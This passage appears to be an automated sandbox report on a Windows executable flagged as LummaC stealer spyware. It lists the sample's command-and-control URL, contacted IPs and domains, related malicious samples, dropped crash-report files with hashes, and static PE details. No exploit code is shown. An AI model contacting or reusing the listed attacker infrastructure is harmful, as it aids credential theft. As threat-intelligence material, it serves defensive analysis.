https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apiZ	NAnOVCOt4L.exe, 00000000.00000003.1853962544.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1828385529.0000000001532000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854210350.0000000001532000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.199.72	observerfry.lat	United States	13335	CLOUDFLARENETUS	false
3.5.27.149	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
185.166.143.50	bitbucket.org	Germany	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579978
Start date and time:	2024-12-23 17:29:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NAnOVCOt4L.exe renamed because original name is a hash value
Original Sample Name:	352456d0fc286ccabe5d1ad2efc6ca5c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 20.12.23.50, 20.190.177.85, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target NAnOVCOt4L.exe, PID 7008 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: NAnOVCOt4L.exe

Simulations

Behavior and APIs

Time	Type	Description
11:30:00	API Interceptor	29x Sleep call for process: NAnOVCOt4L.exe modified
11:31:01	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.199.72	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse
	0HdDuWzp54.exe	Get hash	malicious	LummaC, Stealc	Browse
	NE4jxHLxXJ.exe	Get hash	malicious	LummaC, Stealc	Browse
	U8mbM8r793.exe	Get hash	malicious	LummaC, Stealc	Browse
185.166.143.50	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse
	V7giEUv6Ee.bat	Get hash	malicious	Unknown	Browse
	GdGXG0bnxH.exe	Get hash	malicious	Unknown	Browse
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Remcos	Browse
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-w.us-east-1.amazonaws.com	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	3.5.29.203
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	52.217.75.84
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	3.5.25.145
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	3.5.29.153
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	3.5.25.82
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	3.5.29.90
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	52.216.152.124
	mG83m82qhF.exe	Get hash	malicious	LummaC	Browse	52.217.136.89
	LP4a6BowQN.exe	Get hash	malicious	LummaC	Browse	16.182.101.249
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse	52.217.67.100
observerfry.lat	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	0HdDuWzp54.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	Yh6fS6qfTE.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	NE4jxHLxXJ.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	U8mbM8r793.exe	Get hash	malicious	LummaC, Stealc	Browse	172.67.199.72
	ABnDy7rLFS.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
bitbucket.org	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.166.143.48
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	jSFUzuYPG9.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	mG83m82qhF.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	LP4a6BowQN.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	zLP3oiwG1g.exe	Get hash	malicious	LummaC	Browse	185.166.143.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	104.21.36.201
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	104.21.63.229
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	104.21.36.201
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse	172.67.199.72
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	SalmonSamurai.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	MT Eagle Asia 11.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
AMAZON-02US	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	185.166.143.48
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	185.166.143.49
	ChoForgot.exe	Get hash	malicious	Vidar	Browse	3.160.188.50
	Payout Receipts.pptx	Get hash	malicious	HTMLPhisher	Browse	52.89.58.139
	https://mandrillapp.com/track/click/30363981/app.salesforceiq.com?p=eyJzIjoiQ21jNldfVTIxTkdJZi1NQzQ1SGE3SXJFTW1RIiwidiI6MSwicCI6IntcInVcIjozMDM2Mzk4MSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FwcC5zYWxlc2ZvcmNlaXEuY29tXFxcL3I_dD1BRndoWmYwNjV0QlFRSnRiMVFmd1A1dC0tMHZnQkowaF9lYklFcTVLRlhTWHFVWmFpNUo4RlFTd1dycTkzR1FPbEFuczlLREd2VzRJQ2Z2eGo4WjVDSkQxUTlXdDVvME5XNWMwY0tIaXpVQWJ1YnBhT2dtS2pjVkxkaDFZWE8ybklsdFRlb2VQZ2dVTCZ0YXJnZXQ9NjMxZjQyMGVlZDEzY2EzYmNmNzdjMzI0JnVybD1odHRwczpcXFwvXFxcL21haW4uZDNxczBuMG9xdjNnN28uYW1wbGlmeWFwcC5jb21cIixcImlkXCI6XCI5ZTdkODJiNWQ0NzA0YWVhYTQ1ZjkxY2Y0ZTFmNGRiMFwiLFwidXJsX2lkc1wiOltcImY5ODQ5NWVhMjMyYTgzNjg1ODUxN2Y4ZTRiOTVjZjg4MWZlODExNmJcIl19In0	Get hash	malicious	Unknown	Browse	44.226.126.181
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	185.166.143.48
	https://email.equifaxbreachsettlement.com/c/eJwczbFugzAQANCvsccIzoaYwQMNWE1VEQoM2SxzPgRSCJS4pfn7qt2f9Lx2FDunOOn4KGQWZUopPmqCAb0Uie8hxR6VP6bocQBKMO4TJfikIQIZAwAIkFIdhB9SzAQJJdOk90cmI_r8mgb302_kcHxQCDea6R4OuMz8pscQ1gcTOQPDwOz7fpif60armzzSPdD25xiYjTzRzIQhXDwxUZzeTHN9iV5l137wTXdV-d5eKgXAZPR047L8B0GX5mrr5mKbvMtt3ZR1fi7sKW8KW5zbzrZlVfBvDb8BAAD__6sTT70	Get hash	malicious	HtmlDropper	Browse	13.56.148.153
	https://mandrillapp.com/track/click/30903880/lamp.avocet.io?p=eyJzIjoiM2NCLS1TMlk4RWF3Nl9vVXV4SHlzRDZ5dmJJIiwidiI6MSwicCI6IntcInVcIjozMDkwMzg4MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2xhbXAuYXZvY2V0LmlvXFxcL25ldy11c2VyXCIsXCJpZFwiOlwiMTMxMTQyZmQwMzMxNDA4MWE0YmQyOGYzZDRmYmViYzRcIixcInVybF9pZHNcIjpbXCI0OWFlZTViODJkYzk4NGYxNTg2ZGIzZTYzNGE5ZWUxMDgxYjVmMDY5XCJdfSJ9	Get hash	malicious	Unknown	Browse	76.223.125.47
	R2-Signed.exe	Get hash	malicious	ValleyRAT	Browse	18.139.89.40
AMAZON-AESUS	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	3.5.29.203
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	3.5.25.145
	payment_3493.pdf	Get hash	malicious	Unknown	Browse	3.5.29.153
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	3.5.25.82
	dWGmbwk5xy.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	34.226.108.155
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	3.5.29.90
	qlo1CDVCSf.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	34.226.108.155
	6dPpCeWDig.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	34.226.108.155
	kFrGefsAK3.exe	Get hash	malicious	Cryptbot	Browse	34.226.108.155
	NT3kfq4eeE.exe	Get hash	malicious	Cryptbot	Browse	34.226.108.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	2jx1O1t486.exe	Get hash	malicious	LummaC, Stealc	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	OtHVIQ2ge4.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	fr2Mul3G6m.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	t8cdzT49Yr.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	file.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	acronis recovery expert deluxe 1.0.0.132.rarl.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	FBmz85HS0d.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	BJQizQ6sqT.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72
	2ZsJ2iP8Q2.exe	Get hash	malicious	LummaC	Browse	3.5.27.149 185.166.143.50 172.67.199.72

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_NAnOVCOt4L.exe_e03ff422de458d3e02686ecdabbdd9a5191feef_626da107_6520921b-e6d1-4654-8976-83bca05cd540\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0424623154591168
Encrypted:	false
SSDEEP:	96:gGFB6E+ygsVhroI7JfPQXIDcQvc6QcEVcw3cE//+HbHg/8BRTf3Oy1oVazW0EVse:nLz9gL0BU/Yjudx2fzuiFpZ24IO83
MD5:	3BDA91AF927C88C01FCBAC4E62283D3F
SHA1:	AD87AC3E4758224FA0909853736E5319D2D1B613
SHA-256:	0C85EF0DEBCEAC170FC6C52843641EAB3440F67F5BD76308C67E9E550E678775
SHA-512:	9898609C1D031A8642A6E5F4B1ABE46857F8D6C4AB9A3F98436DA64DAA12D3A590154FC1F76546B9CE39FAD510A9367AE33544F3B744DF94055BF8899E18FE86
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.4.5.0.3.0.9.0.2.4.7.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.4.5.0.3.1.5.1.1.8.4.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.2.0.9.2.1.b.-.e.6.d.1.-.4.6.5.4.-.8.9.7.6.-.8.3.b.c.a.0.5.c.d.5.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.5.9.2.d.d.6.f.-.0.9.f.a.-.4.5.4.a.-.b.5.e.7.-.6.3.9.8.1.d.d.7.7.8.e.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.A.n.O.V.C.O.t.4.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.6.0.-.0.0.0.1.-.0.0.1.4.-.8.0.9.9.-.9.a.e.7.5.7.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.4.c.a.9.7.c.f.0.2.6.4.7.a.0.7.9.7.b.e.c.a.2.a.e.7.7.f.e.8.3.d.0.0.0.0.f.f.f.f.!.0.0.0.0.9.8.2.3.4.7.b.4.b.b.b.d.0.a.0.9.e.0.c.2.c.e.8.0.1.6.b.6.9.d.4.1.4.0.4.8.d.9.f.b.!.N.A.n.O.V.C.O.t.4.L...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC900.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 23 16:30:31 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	290974
Entropy (8bit):	1.4840724802871046
Encrypted:	false
SSDEEP:	384:wmHWgamoikaQmBB9tgW/3PCUZ0tiU0yDn44S1gTpfCowOAJ+5BdtVNXa/+Vhb9fw:wmoQQmBBLv3PCUZUe1gTp6owazRq0f
MD5:	C46CCFF0DD2FFD794C395198AE3B27A4
SHA1:	D8B44FC8A27E37BBD66E491C499BF7A27D6E5EFB
SHA-256:	5AFBE6B3B46BCBC9E14821DC26D37387508ED3527E21B05E6656F3423BC2C602
SHA-512:	A91A0519176653116D87C3186CFA758E0E22E66FAFDFA9B15BF1E9CB5CE717647105D24FFE25A45A39DD3AC11E295E7B619F2C38D1E33669CE08ACBB019ED01E
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......'.ig....................................,....'......................`.......8...........T............K...$...........(...........*..............................................................................eJ......H+......GenuineIntel............T.......`.....ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA59.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8384
Entropy (8bit):	3.703742813957452
Encrypted:	false
SSDEEP:	192:R6l7wVeJ286I6Y99SU9ItgmfZiprZ89bym+qsfiQmm:R6lXJV6I6YnSU9ItgmfZJym+Jfi4
MD5:	F4997731EADDEC0B57053BCFB89115C9
SHA1:	06CD046DF67B3848D6DB49B6B2B4D0F963ABA12A
SHA-256:	B1420F9E8D85416DF7D45AAF0434F01B08529B21CA1774085DFDF903B7669D4F
SHA-512:	CDE3983CB8A1C821B223670D481BA7AA3BF500878B00435D3E13DC2AF4F5A75A5DB2976FAA806F86361F00380ADE20285AF2E03638084F9D54E95FAD83A86841
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCA89.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4624
Entropy (8bit):	4.508110251154174
Encrypted:	false
SSDEEP:	48:cvIwWl8zsRJg77aI9ylWpW8VYpQYm8M4JJKqFd3+q8W6q/zi9d:uIjfjI7sU7V+9Jf3B/zi9d
MD5:	E0EC6A9E5E5E7EA76DB04C5ED8E0DE8E
SHA1:	107EB4153636140E65FA8AC2D1AC9F615F8E1561
SHA-256:	DA206371F9CB185D53A3F262CC6AD6697DA59FF5E22D4DD4060554DCA92BB1C6
SHA-512:	03058B89CCDE9CFBBF7FE062EF12CA375168549CC7522FF5A369FE16BB7D66A7D3EC21E88A653FA6E205CE9437431900E8D7342C6EBA47FB4DD13B631488BC02
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="644133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465443947252411
Encrypted:	false
SSDEEP:	6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSbh:hXD94+WlLZMM6YFHS+h
MD5:	84F81A4B62C27C5FCF7408F99AA4F6AE
SHA1:	3AEDB7F4A66A4F6382A43BA32250FB2D7756AB6F
SHA-256:	2896170ACC32784C0E5423892C1F350E516009397F429D63AAB33C5516BFD65E
SHA-512:	C64A97D0EC4E0919F46D1DEC76471E0633B4FAF4CD43D81B89DDDD7CB41D860310E387E49559A2D0F986906C3C4C7F90249CBC88C3AFB3D7EEC9A5535D9B7D4F
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...WU..............................................................................................................................................................................................................................................................................................................................................?U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.562229423692589
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	NAnOVCOt4L.exe
File size:	2'875'392 bytes
MD5:	352456d0fc286ccabe5d1ad2efc6ca5c
SHA1:	982347b4bbbd0a09e0c2ce8016b69d414048d9fb
SHA256:	c5afbe8a6fa9ef50c2b543eb287c4862faa59edd18e51d7d4d65332f75c7e6ca
SHA512:	07ce491a2d8a824955e752046ecf2cd0e9278497807095ec558180889a09fcf433ab97ce4a84a2022d547dd750a61d1ae87eed1a28b184d6a5297e011c9e6a69
SSDEEP:	49152:I0O9Z7h4mRO+En55Xv3WcT1FNQRqMgdF:NO9ZV/RVEn5J3nXNQR5
TLSH:	D8D54BD2B945F1CBD48E26B49527CD429AAE03F947310AD3EC2C74BA7E63CC115B6CA4
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..........................................@...................................+...@.................................T0..h..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x6eb000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F60348C68DAh
movsx ebp, byte ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ds
add eax, 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
aas
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 0Ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x53054	0x68	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x531f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
